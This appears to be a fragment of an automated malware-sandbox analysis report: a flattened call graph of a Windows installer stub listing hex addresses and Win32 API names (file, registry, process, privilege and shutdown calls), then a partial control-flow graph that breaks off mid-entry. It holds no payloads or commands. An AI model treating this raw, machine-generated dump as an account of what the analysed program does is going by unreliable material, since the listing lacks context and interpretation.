3831->3835 3832 4017a9 3833 405dd6 3 API calls 3832->3833 3834 4017af lstrcatW 3833->3834 3834->3831 3839 4017bb 3835->3839 3836 40683d 2 API calls 3836->3839 3837 405fd2 2 API calls 3837->3839 3839->3836 3839->3837 3840 4017cd CompareFileTime 3839->3840 3841 40188d 3839->3841 3847 406507 lstrcpynW 3839->3847 3851 406544 17 API calls 3839->3851 3861 401864 3839->3861 3863 405ff7 GetFileAttributesW CreateFileW 3839->3863 3866 405b67 3839->3866 3840->3839 3842 405569 24 API calls 3841->3842 3844 401897 3842->3844 3843 405569 24 API calls 3849 401879 3843->3849 3845 4032b4 35 API calls 3844->3845 3846 4018aa 3845->3846 3848 4018be SetFileTime 3846->3848 3850 4018d0 CloseHandle 3846->3850 3847->3839 3848->3850 3852 4018e1 3850->3852 3853 40239d 3850->3853 3851->3839 3854 4018e6 3852->3854 3855 4018f9 3852->3855 3853->3849 3856 406544 17 API calls 3854->3856 3857 406544 17 API calls 3855->3857 3859 4018ee lstrcatW 3856->3859 3860 401901 3857->3860 3859->3860 3862 405b67 MessageBoxIndirectW 3860->3862 3861->3843 3861->3849 3862->3853 3863->3839 3864->3831 3865->3832 3867 405b7c 3866->3867 3868 405bc8 3867->3868 3869 405b90 MessageBoxIndirectW 3867->3869 3868->3839 3869->3868 4534 401a72 4535 402d84 17 API calls 4534->4535 4536 401a7b 4535->4536 4537 402d84 17 API calls 4536->4537 4538 401a20 4537->4538 3880 401573 3881 401583 ShowWindow 3880->3881 3882 40158c 3880->3882 3881->3882 3883 40159a ShowWindow 3882->3883 3884 402c2a 3882->3884 3883->3884 3885 4023f4 3886 402da6 17 API calls 3885->3886 3887 402403 3886->3887 3888 402da6 17 API calls 3887->3888 3889 40240c 3888->3889 3890 402da6 17 API calls 3889->3890 3891 402416 GetPrivateProfileStringW 3890->3891 4539 403b74 4540 403b7f 4539->4540 4541 403b86 GlobalAlloc 4540->4541 4542 403b83 4540->4542 4541->4542 4543 4014f5 SetForegroundWindow 4544 402c2a 4543->4544 4545 401ff6 4546 402da6 17 API calls 4545->4546 4547 401ffd 4546->4547 4548 40683d 2 API calls 4547->4548 4549 402003 4548->4549 4551 402014 4549->4551 4552 40644e wsprintfW 4549->4552 4552->4551 3927 4034f7 SetErrorMode GetVersionExW 3928 403581 3927->3928 3929 403549 GetVersionExW 3927->3929 3930 4035da 3928->3930 3931 4068d4 5 API calls 3928->3931 3929->3928 3932 406864 3 API calls 3930->3932 3931->3930 3933 4035f0 lstrlenA 3932->3933 3933->3930 3934 403600 3933->3934 3935 4068d4 5 API calls 3934->3935 3936 403607 3935->3936 3937 4068d4 5 API calls 3936->3937 3938 40360e 3937->3938 3939 4068d4 5 API calls 3938->3939 3940 40361a #17 OleInitialize SHGetFileInfoW 3939->3940 4018 406507 lstrcpynW 3940->4018 3943 403667 GetCommandLineW 4019 406507 lstrcpynW 3943->4019 3945 403679 3946 405e03 CharNextW 3945->3946 3947 40369f CharNextW 3946->3947 3953 4036b0 3947->3953 3948 4037ae 3949 4037c2 GetTempPathW 3948->3949 4020 4034c6 3949->4020 3951 4037da 3954 403834 DeleteFileW 3951->3954 3955 4037de GetWindowsDirectoryW lstrcatW 3951->3955 3952 405e03 CharNextW 3952->3953 3953->3948 3953->3952 3960 4037b0 3953->3960 4030 40307d GetTickCount GetModuleFileNameW 3954->4030 3957 4034c6 12 API calls 3955->3957 3958 4037fa 3957->3958 3958->3954 3959 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3958->3959 3963 4034c6 12 API calls 3959->3963 4114 406507 lstrcpynW 3960->4114 3961 403847 3962 40390b 3961->3962 3964 4038fc 3961->3964 3968 405e03 CharNextW 3961->3968 4119 403adc 3962->4119 3967 40382c 3963->3967 4058 403bb6 3964->4058 3967->3954 3967->3962 3985 403869 3968->3985 3971 403a33 3973 405b67 MessageBoxIndirectW 3971->3973 3972 403a48 3974 403a50 GetCurrentProcess OpenProcessToken 3972->3974 3975 403ac6 ExitProcess 3972->3975 3979 403a40 ExitProcess 3973->3979 3980 403a96 3974->3980 3981 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3974->3981 3977 4038d2 3982 405ede 18 API calls 3977->3982 3978 403913 3984 405ad2 5 API calls 3978->3984 3983 4068d4 5 API calls 3980->3983 3981->3980 3986 4038de 3982->3986 3987 403a9d 3983->3987 3988 403918 lstrcatW 3984->3988 3985->3977 3985->3978 3986->3962 4115 406507 lstrcpynW 3986->4115 3989 403ab2 ExitWindowsEx 3987->3989 3994 403abf 3987->3994 3990 403934 lstrcatW lstrcmpiW 3988->3990 3991 403929 lstrcatW 3988->3991 3989->3975 3989->3994 3990->3962 3992 403954 3990->3992 3991->3990 3995 403960 3992->3995 3996 403959 3992->3996 3998 40140b 2 API calls 3994->3998 4000 405ab5 2 API calls 3995->4000 3999 405a38 4 API calls 3996->3999 3997 4038f1 4116 406507 lstrcpynW 3997->4116 3998->3975 4002 40395e 3999->4002 4003 403965 SetCurrentDirectoryW 4000->4003 4002->4003 4004 403982 4003->4004 4005 403977 4003->4005 4118 406507 lstrcpynW 4004->4118 4117 406507 lstrcpynW 4005->4117 4008 406544 17 API calls 4009 4039c4 DeleteFileW 4008->4009 4010 4039d0 CopyFileW 4009->4010 4015 40398f 4009->4015 4010->4015 4011 403a1a 4013 4062c7 36 API calls 4011->4013 4012 4062c7 36 API calls 4012->4015 4013->3962 4014 406544 17 API calls 4014->4015 4015->4008 4015->4011 4015->4012 4015->4014 4016 405aea 2 API calls 4015->4016 4017 403a04 CloseHandle 4015->4017 4016->4015 4017->4015 4018->3943 4019->3945 4021 40678e 5 API calls 4020->4021 4022 4034d2 4021->4022 4023 4034dc 4022->4023 4024 405dd6 3 API calls 4022->4024 4023->3951 4025 4034e4 4024->4025 4026 405ab5 2 API calls 4025->4026 4027 4034ea 4026->4027 4028 406026 2 API calls 4027->4028 4029 4034f5 4028->4029 4029->3951 4126 405ff7 GetFileAttributesW CreateFileW 4030->4126 4032 4030bd 4033 4030cd 4032->4033 4127 406507 lstrcpynW 4032->4127 4033->3961 4035 4030e3 4036 405e22 2 API calls 4035->4036 4037 4030e9 4036->4037 4128 406507 lstrcpynW 4037->4128 4039 4030f4 GetFileSize 4054 4031ee 4039->4054 4057 40310b 4039->4057 4041 4031f7 4041->4033 4043 403227 GlobalAlloc 4041->4043 4141 4034af SetFilePointer 4041->4141 4042 403499 ReadFile 4042->4057 4140 4034af SetFilePointer 4043->4140 4045 40325a 4047 403019 6 API calls 4045->4047 4047->4033 4048 403210 4050 403499 ReadFile 4048->4050 4049 403242 4051 4032b4 35 API calls 4049->4051 4052 40321b 4050->4052 4055 40324e 4051->4055 4052->4033 4052->4043 4053 403019 6 API calls 4053->4057 4129 403019 4054->4129 4055->4033 4055->4055 4056 40328b SetFilePointer 4055->4056 4056->4033 4057->4033 4057->4042 4057->4045 4057->4053 4057->4054 4059 4068d4 5 API calls 4058->4059 4060 403bca 4059->4060 4061 403bd0 4060->4061 4062 403be2 4060->4062 4150 40644e wsprintfW 4061->4150 4063 4063d5 3 API calls 4062->4063 4064 403c12 4063->4064 4066 403c31 lstrcatW 4064->4066 4068 4063d5 3 API calls 4064->4068 4067 403be0 4066->4067 4142 403e8c 4067->4142 4068->4066 4071 405ede 18 API calls 4072 403c63 4071->4072 4073 403cf7 4072->4073 4075 4063d5 3 API calls 4072->4075 4074 405ede 18 API calls 4073->4074 4076 403cfd 4074->4076 4077 403c95 4075->4077 4078 403d0d LoadImageW 4076->4078 4079 406544 17 API calls 4076->4079 4077->4073 4082 403cb6 lstrlenW 4077->4082 4086 405e03 CharNextW 4077->4086 4080 403db3 4078->4080 4081 403d34 RegisterClassW 4078->4081 4079->4078 4085 40140b 2 API calls 4080->4085 4083 403dbd 4081->4083 4084 403d6a SystemParametersInfoW CreateWindowExW 4081->4084 4087 403cc4 lstrcmpiW 4082->4087 4088 403cea 4082->4088 4083->3962 4084->4080 4089 403db9 4085->4089 4090 403cb3 4086->4090 4087->4088 4091 403cd4 GetFileAttributesW 4087->4091 4092 405dd6 3 API calls 4088->4092 4089->4083 4095 403e8c 18 API calls 4089->4095 4090->4082 4094 403ce0 4091->4094 4093 403cf0 4092->4093 4151 406507 lstrcpynW 4093->4151 4094->4088 4098 405e22 2 API calls 4094->4098 4096 403dca 4095->4096 4099 403dd6 ShowWindow 4096->4099 4100 403e59 4096->4100 4098->4088 4101 406864 3 API calls 4099->4101 4102 40563c 5 API calls 4100->4102 4103 403dee 4101->4103 4104 403e5f 4102->4104 4107 403dfc GetClassInfoW 4103->4107 4109 406864 3 API calls 4103->4109 4105 403e63 4104->4105 4106 403e7b 4104->4106 4105->4083 4112 40140b 2 API calls 4105->4112 4108 40140b 2 API calls 4106->4108 4110 403e10 GetClassInfoW RegisterClassW 4107->4110 4111 403e26 DialogBoxParamW 4107->4111 4108->4083 4109->4107 4110->4111 4113 40140b 2 API calls 4111->4113 4112->4083 4113->4083 4114->3949 4115->3997 4116->3964 4117->4004 4118->4015 4120 403af4 4119->4120 4121 403ae6 CloseHandle 4119->4121 4153 403b21 4120->4153 4121->4120 4124 405c13 67 API calls 4125 403a28 OleUninitialize 4124->4125 4125->3971 4125->3972 4126->4032 4127->4035 4128->4039 4130 403022 4129->4130 4131 40303a 4129->4131 4132 403032 4130->4132 4133 40302b DestroyWindow 4130->4133 4134 403042 4131->4134 4135 40304a GetTickCount 4131->4135 4132->4041 4133->4132 4136 406910 2 API calls 4134->4136 4137 403058 CreateDialogParamW ShowWindow 4135->4137 4138 40307b 4135->4138 4139 403048 4136->4139 4137->4138 4138->4041 4139->4041 4140->4049 4141->4048 4143 403ea0 4142->4143 4152 40644e wsprintfW 4143->4152 4145 403f11 4146 403f45 18 API calls 4145->4146 4148 403f16 4146->4148 4147 403c41 4147->4071 4148->4147 4149 406544 17 API calls 4148->4149 4149->4148 4150->4067 4151->4073 4152->4145 4154 403b2f 4153->4154 4155 403af9 4154->4155 4156 403b34 FreeLibrary GlobalFree 4154->4156 4155->4124 4156->4155 4156->4156 4553 401b77 4554 402da6 17 API calls 4553->4554 4555 401b7e 4554->4555 4556 402d84 17 API calls 4555->4556 4557 401b87 wsprintfW 4556->4557 4558 402c2a 4557->4558 4157 40167b 4158 402da6 17 API calls 4157->4158 4159 401682 4158->4159 4160 402da6 17 API calls 4159->4160 4161 40168b 4160->4161 4162 402da6 17 API calls 4161->4162 4163 401694 MoveFileW 4162->4163 4164 4016a7 4163->4164 4170 4016a0 4163->4170 4165 4022f6 4164->4165 4166 40683d 2 API calls 4164->4166 4168 4016b6 4166->4168 4167 401423 24 API calls 4167->4165 4168->4165 4169 4062c7 36 API calls 4168->4169 4169->4170 4170->4167 4559 406bfe 4560 406a82 4559->4560 4561 4073ed 4560->4561 4562 406b03 GlobalFree 4560->4562 4563 406b0c GlobalAlloc 4560->4563 4564 406b83 GlobalAlloc 4560->4564 4565 406b7a GlobalFree 4560->4565 4562->4563 4563->4560 4563->4561 4564->4560 4564->4561 4565->4564 4171 4022ff 4172 402da6 17 API calls 4171->4172 4173 402305 4172->4173 4174 402da6 17 API calls 4173->4174 4175 40230e 4174->4175 4176 402da6 17 API calls 4175->4176 4177 402317 4176->4177 4178 40683d 2 API calls 4177->4178 4179 402320 4178->4179 4180 402331 lstrlenW lstrlenW 4179->4180 4184 402324 4179->4184 4182 405569 24 API calls 4180->4182 4181 405569 24 API calls 4185 40232c 4181->4185 4183 40236f SHFileOperationW 4182->4183 4183->4184 4183->4185 4184->4181 4184->4185 4566 4019ff 4567 402da6 17 API calls 4566->4567 4568 401a06 4567->4568 4569 402da6 17 API calls 4568->4569 4570 401a0f 4569->4570 4571 401a16 lstrcmpiW 4570->4571 4572 401a28 lstrcmpW 4570->4572 4573 401a1c 4571->4573 4572->4573 4574 401000 4575 401037 BeginPaint GetClientRect 4574->4575 4576 40100c DefWindowProcW 4574->4576 4578 4010f3 4575->4578 4579 401179 4576->4579 4580 401073 CreateBrushIndirect FillRect DeleteObject 4578->4580 4581 4010fc 4578->4581 4580->4578 4582 401102 CreateFontIndirectW 4581->4582 4583 401167 EndPaint 4581->4583 4582->4583 4584 401112 6 API calls 4582->4584 4583->4579 4584->4583 4585 401d81 4586 401d94 GetDlgItem 4585->4586 4587 401d87 4585->4587 4589 401d8e 4586->4589 4588 402d84 17 API calls 4587->4588 4588->4589 4590 401dd5 GetClientRect LoadImageW SendMessageW 4589->4590 4591 402da6 17 API calls 4589->4591 4593 401e33 4590->4593 4595 401e3f 4590->4595 4591->4590 4594 401e38 DeleteObject 4593->4594 4593->4595 4594->4595 4596 401503 4597 40150b 4596->4597 4599 40151e 4596->4599 4598 402d84 17 API calls 4597->4598 4598->4599 4600 402383 4601 40238a 4600->4601 4604 40239d 4600->4604 4602 406544 17 API calls 4601->4602 4603 402397 4602->4603 4605 405b67 MessageBoxIndirectW 4603->4605 4605->4604 3467 402c05 SendMessageW 3468 402c2a 3467->3468 3469 402c1f InvalidateRect 3467->3469 3469->3468 3470 40248a 3471 402da6 17 API calls 3470->3471 3472 40249c 3471->3472 3473 402da6 17 API calls 3472->3473 3474 4024a6 3473->3474 3487 402e36 3474->3487 3477 40292e 3478 4024de 3480 4024ea 3478->3480 3483 402d84 17 API calls 3478->3483 3479 402da6 17 API calls 3482 4024d4 lstrlenW 3479->3482 3481 402509 RegSetValueExW 3480->3481 3491 4032b4 3480->3491 3485 40251f RegCloseKey 3481->3485 3482->3478 3483->3480 3485->3477 3488 402e51 3487->3488 3512 4063a2 3488->3512 3492 4032cd 3491->3492 3493 4032f8 3492->3493 3526 4034af SetFilePointer 3492->3526 3516 403499 3493->3516 3497 403423 3497->3481 3498 403315 GetTickCount 3508 403328 3498->3508 3499 403439 3500 40343d 3499->3500 3504 403455 3499->3504 3501 403499 ReadFile 3500->3501 3501->3497 3502 403499 ReadFile 3502->3504 3503 403499 ReadFile 3503->3508 3504->3497 3504->3502 3505 4060a9 WriteFile 3504->3505 3505->3504 3507 40338e GetTickCount 3507->3508 3508->3497 3508->3503 3508->3507 3509 4033b7 MulDiv wsprintfW 3508->3509 3511 4060a9 WriteFile 3508->3511 3519 406a4f 3508->3519 3510 405569 24 API calls 3509->3510 3510->3508 3511->3508 3513 4063b1 3512->3513 3514 4024b6 3513->3514 3515 4063bc RegCreateKeyExW 3513->3515 3514->3477 3514->3478 3514->3479 3515->3514 3517 40607a ReadFile 3516->3517 3518 403303 3517->3518 3518->3497 3518->3498 3518->3499 3520 406a74 3519->3520 3523 406a7c 3519->3523 3520->3508 3521 406b03 GlobalFree 3522 406b0c GlobalAlloc 3521->3522 3522->3520 3522->3523 3523->3520 3523->3521 3523->3522 3524 406b83 GlobalAlloc 3523->3524 3525 406b7a GlobalFree 3523->3525 3524->3520 3524->3523 3525->3524 3526->3493 3530 40290b 3531 402da6 17 API calls 3530->3531 3532 402912 FindFirstFileW 3531->3532 3533 40293a 3532->3533 3536 402925 3532->3536 3538 40644e wsprintfW 3533->3538 3535 402943 3539 406507 lstrcpynW 3535->3539 3538->3535 3539->3536 4613 40190c 4614 401943 4613->4614 4615 402da6 17 API calls 4614->4615 4616 401948 4615->4616 4617 405c13 67 API calls 4616->4617 4618 401951 4617->4618 4619 40490d 4620 404943 4619->4620 4621 40491d 4619->4621 4623 4044ca 8 API calls 4620->4623 4622 404463 18 API calls 4621->4622 4624 40492a SetDlgItemTextW 4622->4624 4625 40494f 4623->4625 4624->4620 4626 40190f 4627 402da6 17 API calls 4626->4627 4628 401916 4627->4628 4629 405b67 MessageBoxIndirectW 4628->4629 4630 40191f 4629->4630 4631 401491 4632 405569 24 API calls 4631->4632 4633 401498 4632->4633 4634 402891 4635 402898 4634->4635 4637 402ba9 4634->4637 4636 402d84 17 API calls 4635->4636 4638 40289f 4636->4638 4639 4028ae SetFilePointer 4638->4639 4639->4637 4640 4028be 4639->4640 4642 40644e wsprintfW 4640->4642 4642->4637 4643 401f12 4644 402da6 17 API calls 4643->4644 4645 401f18 4644->4645 4646 402da6 17 API calls 4645->4646 4647 401f21 4646->4647 4648 402da6 17 API calls 4647->4648 4649 401f2a 4648->4649 4650 402da6 17 API calls 4649->4650 4651 401f33 4650->4651 4652 401423 24 API calls 4651->4652 4653 401f3a 4652->4653 4660 405b2d ShellExecuteExW 4653->4660 4655 401f82 4656 40292e 4655->4656 4657 40697f 5 API calls 4655->4657 4658 401f9f CloseHandle 4657->4658 4658->4656 4660->4655 4661 402f93 4662 402fa5 SetTimer 4661->4662 4663 402fbe 4661->4663 4662->4663 4664 403013 4663->4664 4665 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4663->4665 4665->4664 4666 401d17 4667 402d84 17 API calls 4666->4667 4668 401d1d IsWindow 4667->4668 4669 401a20 4668->4669 4670 404599 lstrcpynW lstrlenW 4671 401b9b 4672 401bec 4671->4672 4677 401ba8 4671->4677 4673 401c16 GlobalAlloc 4672->4673 4674 401bf1 4672->4674 4675 406544 17 API calls 4673->4675 4684 40239d 4674->4684 4692 406507 lstrcpynW 4674->4692 4679 401c31 4675->4679 4676 406544 17 API calls 4680 402397 4676->4680 4677->4679 4681 401bbf 4677->4681 4679->4676 4679->4684 4685 405b67 MessageBoxIndirectW 4680->4685 4690 406507 lstrcpynW 4681->4690 4682 401c03 GlobalFree 4682->4684 4685->4684 4686 401bce 4691 406507 lstrcpynW 4686->4691 4688 401bdd 4693 406507 lstrcpynW 4688->4693 4690->4686 4691->4688 4692->4682 4693->4684 4694 40261c 4695 402da6 17 API calls 4694->4695 4696 402623 4695->4696 4699 405ff7 GetFileAttributesW CreateFileW 4696->4699 4698 40262f 4699->4698 3584 40259e 3594 402de6 3584->3594 3587 402d84 17 API calls 3588 4025b1 3587->3588 3589 4025d9 RegEnumValueW 3588->3589 3590 4025cd RegEnumKeyW 3588->3590 3592 40292e 3588->3592 3591 4025ee RegCloseKey 3589->3591 3590->3591 3591->3592 3595 402da6 17 API calls 3594->3595 3596 402dfd 3595->3596 3597 406374 RegOpenKeyExW 3596->3597 3598 4025a8 3597->3598 3598->3587 4707 40149e 4708 4014ac PostQuitMessage 4707->4708 4709 40239d 4707->4709 4708->4709 4710 404622 4711 40463a 4710->4711 4718 404754 4710->4718 4715 404463 18 API calls 4711->4715 4712 4047be 4713 404888 4712->4713 4714 4047c8 GetDlgItem 4712->4714 4721 4044ca 8 API calls 4713->4721 4716 4047e2 4714->4716 4717 404849 4714->4717 4720 4046a1 4715->4720 4716->4717 4725 404808 SendMessageW LoadCursorW SetCursor 4716->4725 4717->4713 4726 40485b 4717->4726 4718->4712 4718->4713 4719 40478f GetDlgItem SendMessageW 4718->4719 4743 404485 KiUserCallbackDispatcher 4719->4743 4723 404463 18 API calls 4720->4723 4724 404883 4721->4724 4728 4046ae CheckDlgButton 4723->4728 4744 4048d1 4725->4744 4730 404871 4726->4730 4731 404861 SendMessageW 4726->4731 4727 4047b9 4733 4048ad SendMessageW 4727->4733 4741 404485 KiUserCallbackDispatcher 4728->4741 4730->4724 4732 404877 SendMessageW 4730->4732 4731->4730 4732->4724 4733->4712 4736 4046cc GetDlgItem 4742 404498 SendMessageW 4736->4742 4738 4046e2 SendMessageW 4739 404708 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4738->4739 4740 4046ff GetSysColor 4738->4740 4739->4724 4740->4739 4741->4736 4742->4738 4743->4727 4747 405b2d ShellExecuteExW 4744->4747 4746 404837 LoadCursorW SetCursor 4746->4717 4747->4746 3599 4015a3 3600 402da6 17 API calls 3599->3600 3601 4015aa SetFileAttributesW 3600->3601 3602 4015bc 3601->3602 3712 401fa4 3713 402da6 17 API calls 3712->3713 3714 401faa 3713->3714 3715 405569 24 API calls 3714->3715 3716 401fb4 3715->3716 3727 405aea CreateProcessW 3716->3727 3721 401fcf 3723 401fd4 3721->3723 3724 401fdf 3721->3724 3722 40292e 3735 40644e wsprintfW 3723->3735 3726 401fdd CloseHandle 3724->3726 3726->3722 3728 401fba 3727->3728 3729 405b1d CloseHandle 3727->3729 3728->3722 3728->3726 3730 40697f WaitForSingleObject 3728->3730 3729->3728 3731 406999 3730->3731 3732 4069ab GetExitCodeProcess 3731->3732 3736 406910 3731->3736 3732->3721 3735->3726 3737 40692d PeekMessageW 3736->3737 3738 406923 DispatchMessageW 3737->3738 3739 40693d WaitForSingleObject 3737->3739 3738->3737 3739->3731 3740 4056a8 3741 405852 3740->3741 3742 4056c9 GetDlgItem GetDlgItem GetDlgItem 3740->3742 3744 405883 3741->3744 3745 40585b GetDlgItem CreateThread FindCloseChangeNotification 3741->3745 3785 404498 SendMessageW 3742->3785 3747 4058ae 3744->3747 3749 4058d3 3744->3749 3750 40589a ShowWindow ShowWindow 3744->3750 3745->3744 3788 40563c OleInitialize 3745->3788 3746 405739 3754 405740 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3746->3754 3748 40590e 3747->3748 3751 4058c2 3747->3751 3752 4058e8 ShowWindow 3747->3752 3748->3749 3762 40591c SendMessageW 3748->3762 3753 4044ca 8 API calls 3749->3753 3787 404498 SendMessageW 3750->3787 3756 40443c SendMessageW 3751->3756 3758 405908 3752->3758 3759 4058fa 3752->3759 3757 4058e1 3753->3757 3760 405792 SendMessageW SendMessageW 3754->3760 3761 4057ae 3754->3761 3756->3749 3764 40443c SendMessageW 3758->3764 3763 405569 24 API calls 3759->3763 3760->3761 3765 4057c1 3761->3765 3766 4057b3 SendMessageW 3761->3766 3762->3757 3767 405935 CreatePopupMenu 3762->3767 3763->3758 3764->3748 3768 404463 18 API calls 3765->3768 3766->3765 3769 406544 17 API calls 3767->3769 3771 4057d1 3768->3771 3770 405945 AppendMenuW 3769->3770 3772 405962 GetWindowRect 3770->3772 3773 405975 TrackPopupMenu 3770->3773 3774 4057da ShowWindow 3771->3774 3775 40580e GetDlgItem SendMessageW 3771->3775 3772->3773 3773->3757 3776 405990 3773->3776 3777 4057f0 ShowWindow 3774->3777 3778 4057fd 3774->3778 3775->3757 3779 405835 SendMessageW SendMessageW 3775->3779 3780 4059ac SendMessageW 3776->3780 3777->3778 3786 404498 SendMessageW 3778->3786 3779->3757 3780->3780 3781 4059c9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3780->3781 3783 4059ee SendMessageW 3781->3783 3783->3783 3784 405a17 GlobalUnlock SetClipboardData CloseClipboard 3783->3784 3784->3757 3785->3746 3786->3775 3787->3747 3789 4044af SendMessageW 3788->3789 3790 40565f 3789->3790 3793 401389 2 API calls 3790->3793 3794 405686 3790->3794 3791 4044af SendMessageW 3792 405698 OleUninitialize 3791->3792 3793->3790 3794->3791 3795 4021aa 3796 402da6 17 API calls 3795->3796 3797 4021b1 3796->3797 3798 402da6 17 API calls 3797->3798 3799 4021bb 3798->3799 3800 402da6 17 API calls 3799->3800 3801 4021c5 3800->3801 3802 402da6 17 API calls 3801->3802 3803 4021cf 3802->3803 3804 402da6 17 API calls 3803->3804 3805 4021d9 3804->3805 3806 402218 CoCreateInstance 3805->3806 3807 402da6 17 API calls 3805->3807 3810 402237 3806->3810 3807->3806 3808 401423 24 API calls 3809 4022f6 3808->3809 3810->3808 3810->3809 3811 40252a 3812 402de6 17 API calls 3811->3812 3813 402534 3812->3813 3814 402da6 17 API calls 3813->3814 3815 40253d 3814->3815 3816 402548 RegQueryValueExW 3815->3816 3820 40292e 3815->3820 3817 40256e RegCloseKey 3816->3817 3818 402568 3816->3818 3817->3820 3818->3817 3822 40644e wsprintfW 3818->3822 3822->3817 4748 40202a 4749 402da6 17 API calls 4748->4749 4750 402031 4749->4750 4751 4068d4 5 API calls 4750->4751 4752 402040 4751->4752 4753 40205c GlobalAlloc 4752->4753 4755 4020cc 4752->4755 4754 402070 4753->4754 4753->4755 4756 4068d4 5 API calls 4754->4756 4757 402077 4756->4757 4758 4068d4 5 API calls 4757->4758 4759 402081 4758->4759 4759->4755 4763 40644e wsprintfW 4759->4763 4761 4020ba 4764 40644e wsprintfW 4761->4764 4763->4761 4764->4755 4765 404caa 4766 404cd6 4765->4766 4767 404cba 4765->4767 4769 404d09 4766->4769 4770 404cdc SHGetPathFromIDListW 4766->4770 4776 405b4b GetDlgItemTextW 4767->4776 4772 404cf3 SendMessageW 4770->4772 4773 404cec 4770->4773 4771 404cc7 SendMessageW 4771->4766 4772->4769 4774 40140b 2 API calls 4773->4774 4774->4772 4776->4771 3823 405b2d ShellExecuteExW 4777 401a30 4778 402da6 17 API calls 4777->4778 4779 401a39 ExpandEnvironmentStringsW 4778->4779 4780 401a4d 4779->4780 4782 401a60 4779->4782 4781 401a52 lstrcmpW 4780->4781 4780->4782 4781->4782 3870 4023b2 3871 4023c0 3870->3871 3872 4023ba 3870->3872 3874 402da6 17 API calls 3871->3874 3876 4023ce 3871->3876 3873 402da6 17 API calls 3872->3873 3873->3871 3874->3876 3875 402da6 17 API calls 3879 4023e5 WritePrivateProfileStringW 3875->3879 3877 402da6 17 API calls 3876->3877 3878 4023dc 3876->3878 3877->3878 3878->3875 3892 402434 3893 402467 3892->3893 3894 40243c 3892->3894 3896 402da6 17 API calls 3893->3896 3895 402de6 17 API calls 3894->3895 3897 402443 3895->3897 3898 40246e 3896->3898 3900 40244d 3897->3900 3901 40247b 3897->3901 3904 402e64 3898->3904 3902 402da6 17 API calls 3900->3902 3903 402454 RegDeleteValueW RegCloseKey 3902->3903 3903->3901 3905 402e78 3904->3905 3907 402e71 3904->3907 3905->3907 3908 402ea9 3905->3908 3907->3901 3909 406374 RegOpenKeyExW 3908->3909 3910 402ed7 3909->3910 3911 402ee1 3910->3911 3912 402f8c 3910->3912 3913 402ee7 RegEnumValueW 3911->3913 3914 402f0a 3911->3914 3912->3907 3913->3914 3915 402f71 RegCloseKey 3913->3915 3914->3915 3916 402f46 RegEnumKeyW 3914->3916 3917 402f4f RegCloseKey 3914->3917 3919 402ea9 6 API calls 3914->3919 3915->3912 3916->3914 3916->3917 3918 4068d4 5 API calls 3917->3918 3920 402f5f 3918->3920 3919->3914 3921 402f81 3920->3921 3922 402f63 RegDeleteKeyW 3920->3922 3921->3912 3922->3912 3923 401735 3924 402da6 17 API calls 3923->3924 3925 40173c SearchPathW 3924->3925 3926 401757 3925->3926 4802 401d38 4803 402d84 17 API calls 4802->4803 4804 401d3f 4803->4804 4805 402d84 17 API calls 4804->4805 4806 401d4b GetDlgItem 4805->4806 4807 402638 4806->4807 4808 4014b8 4809 4014be 4808->4809 4810 401389 2 API calls 4809->4810 4811 4014c6 4810->4811 4819 40263e 4820 402652 4819->4820 4821 40266d 4819->4821 4824 402d84 17 API calls 4820->4824 4822 402672 4821->4822 4823 40269d 4821->4823 4825 402da6 17 API calls 4822->4825 4826 402da6 17 API calls 4823->4826 4831 402659 4824->4831 4827 402679 4825->4827 4828 4026a4 lstrlenW 4826->4828 4836 406529 WideCharToMultiByte 4827->4836 4828->4831 4830 40268d lstrlenA 4830->4831 4832 4026e7 4831->4832 4833 4026d1 4831->4833 4835 4060d8 5 API calls 4831->4835 4833->4832 4834 4060a9 WriteFile 4833->4834 4834->4832 4835->4833 4836->4830

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 4034f7-403547 SetErrorMode GetVersionExW 1 403581-403588 0->1 2 403549-40357d GetVersionExW 0->2 3 403592-4035d2 1->3 4 40358a 1->4 2->1 5 4035d4-4035dc call 4068d4 3->5 6 4035e5 3->6 4->3 5->6 11 4035de 5->11 8 4035ea-4035fe call 406864 lstrlenA 6->8 13 403600-40361c call 4068d4 * 3 8->13 11->6 20 40362d-40368f #17 OleInitialize SHGetFileInfoW call 406507 GetCommandLineW call 406507 13->20 21 40361e-403624 13->21 28 403691-403693 20->28 29 403698-4036ab call 405e03 CharNextW 20->29 21->20 25 403626 21->25 25->20 28->29 32 4037a2-4037a8 29->32 33 4036b0-4036b6 32->33 34 4037ae 32->34 35 4036b8-4036bd 33->35 36 4036bf-4036c5 33->36 37 4037c2-4037dc GetTempPathW call 4034c6 34->37 35->35 35->36 38 4036c7-4036cb 36->38 39 4036cc-4036d0 36->39 47 403834-40384c DeleteFileW call 40307d 37->47 48 4037de-4037fc GetWindowsDirectoryW lstrcatW call 4034c6 37->48 38->39 41 403790-40379e call 405e03 39->41 42 4036d6-4036dc 39->42 41->32 59 4037a0-4037a1 41->59 45 4036f6-40372f 42->45 46 4036de-4036e5 42->46 53 403731-403736 45->53 54 40374b-403785 45->54 51 4036e7-4036ea 46->51 52 4036ec 46->52 64 403852-403858 47->64 65 403a23-403a31 call 403adc OleUninitialize 47->65 48->47 62 4037fe-40382e GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034c6 48->62 51->45 51->52 52->45 53->54 61 403738-403740 53->61 57 403787-40378b 54->57 58 40378d-40378f 54->58 57->58 63 4037b0-4037bd call 406507 57->63 58->41 59->32 66 403742-403745 61->66 67 403747 61->67 62->47 62->65 63->37 69 40385e-403871 call 405e03 64->69 70 4038ff-403906 call 403bb6 64->70 77 403a33-403a42 call 405b67 ExitProcess 65->77 78 403a48-403a4e 65->78 66->54 66->67 67->54 84 4038c3-4038d0 69->84 85 403873-4038a8 69->85 80 40390b-40390e 70->80 82 403a50-403a65 GetCurrentProcess OpenProcessToken 78->82 83 403ac6-403ace 78->83 80->65 91 403a96-403aa4 call 4068d4 82->91 92 403a67-403a90 LookupPrivilegeValueW AdjustTokenPrivileges 82->92 86 403ad0 83->86 87 403ad3-403ad6 ExitProcess 83->87 88 4038d2-4038e0 call 405ede 84->88 89 403913-403927 call 405ad2 lstrcatW 84->89 93 4038aa-4038ae 85->93 86->87 88->65 103 4038e6-4038fc call 406507 * 2 88->103 106 403934-40394e lstrcatW lstrcmpiW 89->106 107 403929-40392f 